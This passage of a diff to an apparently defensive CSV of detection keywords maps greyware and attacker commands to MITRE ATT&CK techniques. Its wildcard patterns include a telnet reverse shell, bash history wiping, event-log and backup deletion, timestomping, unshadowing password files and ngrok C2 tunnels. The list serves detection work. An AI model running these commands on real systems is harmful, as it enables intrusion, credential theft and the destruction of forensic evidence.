of False positive !","N/A","10","1611","397","2023-10-03T22:19:32Z","2020-06-17T21:48:18Z" +"*sudo rmmod -r*","greyware_tool_keyword","rmmod","Kernel modules are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. This rule identifies attempts to remove a kernel module.","T1547.006 - T1070.006","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_kernel_module_removal.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z" "*syscall * out of bounds*","greyware_tool_keyword","vsftpd","Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dagwieers/vsftpd/","1","0","greyware tool - risks of False positive !","N/A","1","47","66","2020-11-10T13:07:55Z","2013-06-13T10:11:54Z" "*syscall not permitted:*","greyware_tool_keyword","vsftpd","Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dagwieers/vsftpd/","1","0","greyware tool - risks of False positive !","N/A","1","47","66","2020-11-10T13:07:55Z","2013-06-13T10:11:54Z" "*syscall validate failed:*","greyware_tool_keyword","vsftpd","Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dagwieers/vsftpd/","1","0","greyware tool - risks of False positive !","N/A","1","47","66","2020-11-10T13:07:55Z","2013-06-13T10:11:54Z" @@ -1068,35 +1108,35 @@ "*tasklist /svc | findstr /i ""vmtoolsd.exe""*","greyware_tool_keyword","tasklist","commands from wmiexec2.0 - is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","N/A","Discovery","https://github.com/ice-wzl/wmiexec2","1","1","N/A","9","1","10","1","2023-05-14T19:44:26Z","2023-02-07T22:10:08Z" "*tcp://0.tcp.ngrok.io:*","greyware_tool_keyword","ngrok","ngrok - abused by attackers for C2 usage","T1090 - T1095 - T1008","TA0011 - TA0002 - TA0004","N/A","N/A","C2","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","10","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" "*tcpdump *","greyware_tool_keyword","tcpdump","A powerful command-line packet analyzer.and libpcap. a portable C/C++ library for network traffic capture","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","http://www.tcpdump.org/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" -"*telnet * | /bin/bash | telnet *","greyware_tool_keyword","telnet","telnet reverse shell ","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","greyware tool - risks of False positive !","N/A","10","51169","13280","2023-10-02T15:13:46Z","2016-10-18T07:29:07Z" +"*telnet * | /bin/bash | telnet *","greyware_tool_keyword","telnet","telnet reverse shell ","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md","1","0","greyware tool - risks of False positive !","N/A","10","51199","13280","2023-10-04T17:25:07Z","2016-10-18T07:29:07Z" "*tools/adfind*","greyware_tool_keyword","adfind","Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in lateral movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.","T1018 - T1027 - T1046 - T1057 - T1069 - T1087 - T1098 - T1482","TA0001 - TA0002 - TA0003 - TA0007 - TA0011","SolarWinds Compromise","FIN6 - FIN7 - APT29 - Wizard Spider - TA505 - menuPass","Reconnaissance","https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" -"*touch -a*","greyware_tool_keyword","touch","Timestomping is an anti-forensics technique which is used to modify the timestamps of a file* often to mimic files that are in the same folder.","T1070.006 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_timestomp_touch.toml","1","0","greyware tool - risks of False positive !","N/A","10","1611","397","2023-10-03T22:19:32Z","2020-06-17T21:48:18Z" -"*touch -m*","greyware_tool_keyword","touch","Timestomping is an anti-forensics technique which is used to modify the timestamps of a file* often to mimic files that are in the same folder.","T1070.006 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_timestomp_touch.toml","1","0","greyware tool - risks of False positive !","N/A","10","1611","397","2023-10-03T22:19:32Z","2020-06-17T21:48:18Z" -"*touch -r *","greyware_tool_keyword","touch","Timestomping is an anti-forensics technique which is used to modify the timestamps of a file* often to mimic files that are in the same folder.","T1070.006 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_timestomp_touch.toml","1","0","greyware tool - risks of False positive !","N/A","10","1611","397","2023-10-03T22:19:32Z","2020-06-17T21:48:18Z" -"*touch -t *","greyware_tool_keyword","touch","Timestomping is an anti-forensics technique which is used to modify the timestamps of a file* often to mimic files that are in the same folder.","T1070.006 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_timestomp_touch.toml","1","0","greyware tool - risks of False positive !","N/A","10","1611","397","2023-10-03T22:19:32Z","2020-06-17T21:48:18Z" +"*touch -a*","greyware_tool_keyword","touch","Timestomping is an anti-forensics technique which is used to modify the timestamps of a file* often to mimic files that are in the same folder.","T1070.006 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_timestomp_touch.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z" +"*touch -m*","greyware_tool_keyword","touch","Timestomping is an anti-forensics technique which is used to modify the timestamps of a file* often to mimic files that are in the same folder.","T1070.006 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_timestomp_touch.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z" +"*touch -r *","greyware_tool_keyword","touch","Timestomping is an anti-forensics technique which is used to modify the timestamps of a file* often to mimic files that are in the same folder.","T1070.006 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_timestomp_touch.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z" +"*touch -t *","greyware_tool_keyword","touch","Timestomping is an anti-forensics technique which is used to modify the timestamps of a file* often to mimic files that are in the same folder.","T1070.006 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_timestomp_touch.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z" "*Transfer done (but failed to open directory).*","greyware_tool_keyword","vsftpd","Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dagwieers/vsftpd/","1","0","greyware tool - risks of False positive !","N/A","1","47","66","2020-11-10T13:07:55Z","2013-06-13T10:11:54Z" -"*truncate -s0 *bash_history'*","greyware_tool_keyword","bash","Clear command history in linux which is used for defense evasion. ","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1146/T1146.yaml","1","0","greyware tool - risks of False positive !","N/A","10","8145","2531","2023-10-03T21:23:41Z","2017-10-11T17:23:32Z" +"*truncate -s0 *bash_history'*","greyware_tool_keyword","bash","Clear command history in linux which is used for defense evasion. ","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1146/T1146.yaml","1","0","greyware tool - risks of False positive !","N/A","10","8147","2532","2023-10-03T21:23:41Z","2017-10-11T17:23:32Z" "*tshark *-i *","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*tshark -f *","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*tshark -Q*","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*tshark -r *","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*tshark*.deb*","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" -"*ttyd -i 0.0.0.0 -p 7681 *","greyware_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","10","10","837","111","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" -"*ttyd -i 0.0.0.0 -p 7682 *","greyware_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","10","10","837","111","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" +"*ttyd -i 0.0.0.0 -p 7681 *","greyware_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","10","10","837","110","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" +"*ttyd -i 0.0.0.0 -p 7682 *","greyware_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","10","10","837","110","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z" "*tunnels-prod-rel-tm.trafficmanager.net*","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","1","N/A","8","10","N/A","N/A","N/A","N/A" "*UCCAPI/16.0.13328.20130 OC/16.0.13426.20234*","greyware_tool_keyword","lyncsmash","default user agent used by lyncsmash.py - a collection of tools to enumerate and attack self-hosted Skype for Business and Microsoft Lync installations ","T1190 - T1087 - T1110","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/nyxgeek/lyncsmash","1","1","greyware_tools high risks of false positives","N/A","4","323","68","2023-05-03T19:07:11Z","2016-05-20T04:32:41Z" -"*uname -a* w* id* /bin/bash -i*","greyware_tool_keyword","shell","Reverse Shell Command Line","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/SigmaHQ/sigma/blob/master/rules/linux/lnx_shell_susp_rev_shells.yml","1","0","greyware tool - risks of False positive !","N/A","10","6749","1943","2023-10-03T04:55:17Z","2016-12-24T09:48:49Z" -"*unexpected bytes remain after decoding*","greyware_tool_keyword","ssh","Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml","1","0","greyware tool - risks of False positive !","N/A","10","4099","1019","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z" -"*unexpected internal error*","greyware_tool_keyword","ssh","Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml","1","0","greyware tool - risks of False positive !","N/A","10","4099","1019","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z" -"*unknown or unsupported key type*","greyware_tool_keyword","ssh","Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml","1","0","greyware tool - risks of False positive !","N/A","10","4099","1019","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z" -"*unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE*","greyware_tool_keyword","unset","disable history logging","T1056.001 - T1562.001","TA0004 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/OMGLogger","1","1","N/A","10","6","542","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" -"*unset HISTFILE*","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","greyware tool - risks of False positive !","N/A","10","1611","397","2023-10-03T22:19:32Z","2020-06-17T21:48:18Z" +"*uname -a* w* id* /bin/bash -i*","greyware_tool_keyword","shell","Reverse Shell Command Line","T1105 - T1021.001 - T1021.002","TA0002 - TA0008","N/A","N/A","shell spawning","https://github.com/SigmaHQ/sigma/blob/master/rules/linux/lnx_shell_susp_rev_shells.yml","1","0","greyware tool - risks of False positive !","N/A","10","6749","1944","2023-10-04T17:30:31Z","2016-12-24T09:48:49Z" +"*unexpected bytes remain after decoding*","greyware_tool_keyword","ssh","Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml","1","0","greyware tool - risks of False positive !","N/A","10","4103","1020","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z" +"*unexpected internal error*","greyware_tool_keyword","ssh","Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml","1","0","greyware tool - risks of False positive !","N/A","10","4103","1020","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z" +"*unknown or unsupported key type*","greyware_tool_keyword","ssh","Detects suspicious SSH / SSHD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/sshd_rules.xml","1","0","greyware tool - risks of False positive !","N/A","10","4103","1020","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z" +"*unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE*","greyware_tool_keyword","unset","disable history logging","T1056.001 - T1562.001","TA0004 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/OMGLogger","1","1","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*unset HISTFILE*","greyware_tool_keyword","bash","Adversaries may attempt to clear or disable the Bash command-line history in an attempt to evade detection or forensic investigations.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/elastic/detection-rules/blob/main/rules/linux/defense_evasion_deletion_of_bash_command_line_history.toml","1","0","greyware tool - risks of False positive !","N/A","10","1613","398","2023-10-04T17:01:09Z","2020-06-17T21:48:18Z" "*unset HISTFILE*","greyware_tool_keyword","unset","linux commands abused by attackers","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Defense Evasion","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" "*unshadow passwd shadow > *","greyware_tool_keyword","unshadow","linux commands abused by attackers - find guid and suid sensitives perm","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Credential Access - Defense Evasion - Exfiltration","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" -"*updog --*","greyware_tool_keyword","updog","Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.","T1567 - T1074.001 - T1020","TA0010 - TA0009","N/A","N/A","Data Exfiltration - Collection","https://github.com/sc0tfree/updog","1","0","N/A","9","10","2653","289","2023-09-26T06:56:15Z","2020-02-18T15:29:21Z" -"*updog -d /*","greyware_tool_keyword","updog","Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.","T1567 - T1074.001 - T1020","TA0010 - TA0009","N/A","N/A","Data Exfiltration - Collection","https://github.com/sc0tfree/updog","1","0","N/A","9","10","2653","289","2023-09-26T06:56:15Z","2020-02-18T15:29:21Z" -"*updog -p *","greyware_tool_keyword","updog","Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.","T1567 - T1074.001 - T1020","TA0010 - TA0009","N/A","N/A","Data Exfiltration - Collection","https://github.com/sc0tfree/updog","1","0","N/A","9","10","2653","289","2023-09-26T06:56:15Z","2020-02-18T15:29:21Z" -"*updog-master.zip*","greyware_tool_keyword","updog","Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.","T1567 - T1074.001 - T1020","TA0010 - TA0009","N/A","N/A","Data Exfiltration - Collection","https://github.com/sc0tfree/updog","1","1","N/A","9","10","2653","289","2023-09-26T06:56:15Z","2020-02-18T15:29:21Z" +"*updog --*","greyware_tool_keyword","updog","Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.","T1567 - T1074.001 - T1020","TA0010 - TA0009","N/A","N/A","Data Exfiltration - Collection","https://github.com/sc0tfree/updog","1","0","N/A","9","10","2655","289","2023-09-26T06:56:15Z","2020-02-18T15:29:21Z" +"*updog -d /*","greyware_tool_keyword","updog","Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.","T1567 - T1074.001 - T1020","TA0010 - TA0009","N/A","N/A","Data Exfiltration - Collection","https://github.com/sc0tfree/updog","1","0","N/A","9","10","2655","289","2023-09-26T06:56:15Z","2020-02-18T15:29:21Z" +"*updog -p *","greyware_tool_keyword","updog","Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.","T1567 - T1074.001 - T1020","TA0010 - TA0009","N/A","N/A","Data Exfiltration - Collection","https://github.com/sc0tfree/updog","1","0","N/A","9","10","2655","289","2023-09-26T06:56:15Z","2020-02-18T15:29:21Z" +"*updog-master.zip*","greyware_tool_keyword","updog","Updog is a replacement for SimpleHTTPServer. It allows uploading and downloading via HTTP/S can set ad hoc SSL certificates and use http basic auth.","T1567 - T1074.001 - T1020","TA0010 - TA0009","N/A","N/A","Data Exfiltration - Collection","https://github.com/sc0tfree/updog","1","1","N/A","9","10","2655","289","2023-09-26T06:56:15Z","2020-02-18T15:29:21Z" "*uTorrent (1).exe*","greyware_tool_keyword","utorrent","popular BitTorrent client used for downloading files over the BitTorrent network. a peer-to-peer file sharing protocol. Can be used for collection and exfiltration. Not something we want to see installed in a enterprise network","T1193 - T1204 - T1486 - T1048","TA0005 - TA0011 - TA0010 - TA0040","N/A","N/A","Collection - Data Exfiltration","https[://]www[.]utorrent[.]com/intl/fr/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*uTorrent.exe*","greyware_tool_keyword","utorrent","popular BitTorrent client used for downloading files over the BitTorrent network. a peer-to-peer file sharing protocol. Can be used for collection and exfiltration. Not something we want to see installed in a enterprise network","T1193 - T1204 - T1486 - T1048","TA0005 - TA0011 - TA0010 - TA0040","N/A","N/A","Collection - Data Exfiltration","https[://]www[.]utorrent[.]com/intl/fr/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*utorrent_installer.exe*","greyware_tool_keyword","utorrent","popular BitTorrent client used for downloading files over the BitTorrent network. a peer-to-peer file sharing protocol. Can be used for collection and exfiltration. Not something we want to see installed in a enterprise network","T1193 - T1204 - T1486 - T1048","TA0005 - TA0011 - TA0010 - TA0040","N/A","N/A","Collection - Data Exfiltration","https[://]www[.]utorrent[.]com/intl/fr/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" @@ -1116,9 +1156,9 @@ "*wbadmin DELETE SYSTEMSTATEBACKUP*","greyware_tool_keyword","wbadmin","Wbadmin allows administrators to manage and automate backup and recovery operations in Windows systems. Adversaries may abuse wbadmin to manipulate backups and restore points as part of their evasion tactics. This can include deleting backup files. disabling backup tasks. or tampering with backup configurations to hinder recovery efforts and potentially erase traces of their malicious activities. By interfering with backups. adversaries can make it more challenging for defenders to restore systems and detect their presence.","T1490 - T1562.001","TA0040 - TA0007","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*weird status:*","greyware_tool_keyword","vsftpd","Detects suspicious VSFTPD error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dagwieers/vsftpd/","1","0","greyware tool - risks of False positive !","N/A","1","47","66","2020-11-10T13:07:55Z","2013-06-13T10:11:54Z" "*wevtutil cl *","greyware_tool_keyword","wevtutil","adversaries can delete specific event logs or clear their contents. erasing potentially valuable information that could aid in detection. incident response. or forensic investigations. This tactic aims to hinder forensic analysis efforts and make it more challenging for defenders to reconstruct the timeline of events or identify malicious activities.","T1070.004 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive !","10","10","N/A","N/A","N/A","N/A" -"*whoami*","greyware_tool_keyword","whoami","whoami is a legitimate command used to identify the current user executing the command in a terminal or command prompt.whoami can be used to gather information about the current user's privileges. credentials. and account name. which can then be used for lateral movement. privilege escalation. or targeted attacks within the compromised network.","T1003.001 - T1087 - T1057 ","TA0006 - TA0007","N/A","N/A","Information Gathering","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.yaml","1","0","greyware tool - risks of False positive !","N/A","10","8145","2531","2023-10-03T21:23:41Z","2017-10-11T17:23:32Z" -"*whoami.exe* /groups*","greyware_tool_keyword","whoami","whoami is a legitimate command used to identify the current user executing the command in a terminal or command prompt.whoami can be used to gather information about the current user's privileges. credentials. and account name. which can then be used for lateral movement. privilege escalation. or targeted attacks within the compromised network.","T1003.001 - T1087 - T1057 ","TA0006 - TA0007","N/A","N/A","Information Gathering","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.yaml","1","0","greyware tool - risks of False positive !","N/A","10","8145","2531","2023-10-03T21:23:41Z","2017-10-11T17:23:32Z" -"*WinRing0*WinRing0x64.sys*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7768","3471","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*whoami*","greyware_tool_keyword","whoami","whoami is a legitimate command used to identify the current user executing the command in a terminal or command prompt.whoami can be used to gather information about the current user's privileges. credentials. and account name. which can then be used for lateral movement. privilege escalation. or targeted attacks within the compromised network.","T1003.001 - T1087 - T1057 ","TA0006 - TA0007","N/A","N/A","Information Gathering","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.yaml","1","0","greyware tool - risks of False positive !","N/A","10","8147","2532","2023-10-03T21:23:41Z","2017-10-11T17:23:32Z" +"*whoami.exe* /groups*","greyware_tool_keyword","whoami","whoami is a legitimate command used to identify the current user executing the command in a terminal or command prompt.whoami can be used to gather information about the current user's privileges. credentials. and account name. which can then be used for lateral movement. privilege escalation. or targeted attacks within the compromised network.","T1003.001 - T1087 - T1057 ","TA0006 - TA0007","N/A","N/A","Information Gathering","https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.yaml","1","0","greyware tool - risks of False positive !","N/A","10","8147","2532","2023-10-03T21:23:41Z","2017-10-11T17:23:32Z" +"*WinRing0*WinRing0x64.sys*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","1","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" "*winrs -r:*whoami*","greyware_tool_keyword","winrs","WinRS for Lateral Movement","T1021.006 - T1028","TA0008 ","N/A","N/A","Lateral Movement","N/A","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*Wireshark*","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" "*wireshark*.deb*","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","1","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" @@ -1139,20 +1179,20 @@ "*wss://*.tunnels.api.visualstudio.com/api/v1/Connect/*","greyware_tool_keyword","dev-tunnels","Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks","T1021.003 - T1105 - T1090","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*www.ip-api.com*","greyware_tool_keyword","ip-api.com","get public ip address","T1016 - T1071.001","TA0005 - TA0002","N/A","Volt Typhoon","Reconnaissance","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","1","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" "*xcopy c:\* \\*\c$*","greyware_tool_keyword","xcopy","command abused by attackers - exfiltraiton to remote host with xcopy","T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136","TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002","N/A","N/A","Data Exfiltration","N/A","1","0","greyware_tools high risks of false positives","N/A","N/A","N/A","N/A","N/A","N/A" 